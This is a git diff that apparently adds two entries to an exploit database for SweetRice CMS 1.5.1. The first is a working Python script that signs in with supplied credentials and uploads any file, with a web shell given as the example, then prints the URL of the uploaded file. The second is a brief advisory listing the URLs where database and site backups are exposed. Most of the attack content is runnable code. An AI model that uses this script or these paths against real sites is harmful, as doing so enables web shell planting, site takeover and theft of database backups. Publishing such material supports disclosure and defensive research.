diff --git a/files.csv b/files.csv index bb26fa912..76fdce090 100755 --- a/files.csv +++ b/files.csv @@ -30774,6 +30774,7 @@ id,file,description,date,author,platform,type,port 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0 34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0 +40716,platforms/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0 34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0 34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 @@ -30803,6 +30804,7 @@ id,file,description,date,author,platform,type,port 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0 +40718,platforms/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0 diff --git a/platforms/php/webapps/40716.py b/platforms/php/webapps/40716.py new file mode 100755 index 000000000..aa9270bdf --- /dev/null +++ b/platforms/php/webapps/40716.py @@ -0,0 +1,68 @@ +#/usr/bin/python +#-*- Coding: utf-8 -*- +# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload +# Exploit Author: Ashiyane Digital Security Team +# Date: 03-11-2016 +# Vendor: http://www.basic-cms.org/ +# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip +# Version: 1.5.1 +# Platform: WebApp - PHP - Mysql + +import requests +import os +from requests import session + +if os.name == 'nt': + os.system('cls') +else: + os.system('clear') + pass +banner = ''' ++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ +| _________ __ __________.__ | +| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ | +| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ | +| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ | +|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > | +| \/ \/ \/ \/ \/ \/ | +| > SweetRice 1.5.1 Unrestricted File Upload | +| > Script Cod3r : Ehsan Hosseini | ++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ +''' + +print(banner) + + +# Get Host & User & Pass & filename +host = input("Enter The Target URL(Example : localhost.com) : ") +username = input("Enter Username : ") +password = input("Enter Password : ") +filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ") +file = {'upload[]': open(filename, 'rb')} + +payload = { + 'user':username, + 'passwd':password, + 'rememberMe':'' +} + + + +with session() as r: + login = r.post('http://' + host + '/as/?type=signin', data=payload) + success = 'Login success' + if login.status_code == 200: + print("[+] Sending User&Pass...") + if login.text.find(success) > 1: + print("[+] Login Succssfully...") + else: + print("[-] User or Pass is incorrent...") + print("Good Bye...") + exit() + pass + pass + uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file) + if uploadfile.status_code == 200: + print("[+] File Uploaded...") + print("[+] URL : http://" + host + "/attachment/" + filename) + pass \ No newline at end of file diff --git a/platforms/php/webapps/40718.txt b/platforms/php/webapps/40718.txt new file mode 100755 index 000000000..e5208a6a9 --- /dev/null +++ b/platforms/php/webapps/40718.txt @@ -0,0 +1,19 @@ +Title: SweetRice 1.5.1 - Backup Disclosure +Application: SweetRice +Versions Affected: 1.5.1 +Vendor URL: http://www.basic-cms.org/ +Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip +Discovered by: Ashiyane Digital Security Team +Tested on: Windows 10 +Bugs: Backup Disclosure +Date: 16-Sept-2016 + + +Proof of Concept : + +You can access to all mysql backup and download them from this directory. +http://localhost/inc/mysql_backup + +and can access to website files backup from: +http://localhost/SweetRice-transfer.zip +